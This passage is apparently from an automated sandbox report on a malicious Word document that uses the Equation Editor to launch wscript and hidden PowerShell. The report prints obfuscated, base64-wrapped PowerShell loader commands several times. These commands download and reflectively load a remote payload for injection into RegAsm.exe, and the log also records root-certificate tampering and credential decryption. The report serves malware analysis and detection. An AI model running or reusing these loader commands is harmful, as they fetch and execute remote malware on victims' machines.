              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00406A63 CryptUnprotectData,LoadLibraryA,GetProcAddress,CryptUnprotectData,9_2_00406A63
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00638F60 push eax; retf 2_2_00638F61
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0063C3F0 push A00063C4h; ret 2_2_0063C3F5
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006301F4 push eax; retf 2_2_006301F5
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0063C2DC pushad ; retn 0063h2_2_0063C2DD
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0063C288 pushad ; retn 0063h2_2_0063C289
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0063418D push CF121376h; iretd 2_2_006341CC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002621CD push ebx; iretd 8_2_002621EA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457106 push ecx; ret 9_2_00457119
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0045B11A push esp; ret 9_2_0045B141
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0045E54D push esi; ret 9_2_0045E556
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457A28 push eax; ret 9_2_00457A46
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434E56 push ecx; ret 9_2_00434E69
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10002806 push ecx; ret 9_2_10002819
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044693D push ecx; ret 11_2_0044694D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00451D54 push eax; ret 11_2_00451D61
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00451D34 push eax; ret 12_2_00451D41
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00444E71 push ecx; ret 12_2_00444E81
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00414060 push eax; ret 13_2_00414074
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00414060 push eax; ret 13_2_0041409C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00414039 push ecx; ret 13_2_00414049
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004164EB push 0000006Ah; retf 13_2_004165C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00416553 push 0000006Ah; retf 13_2_004165C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00416555 push 0000006Ah; retf 13_2_004165C4

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00406EB0 ShellExecuteW,URLDownloadToFileW,9_2_00406EB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AA4A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CB50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
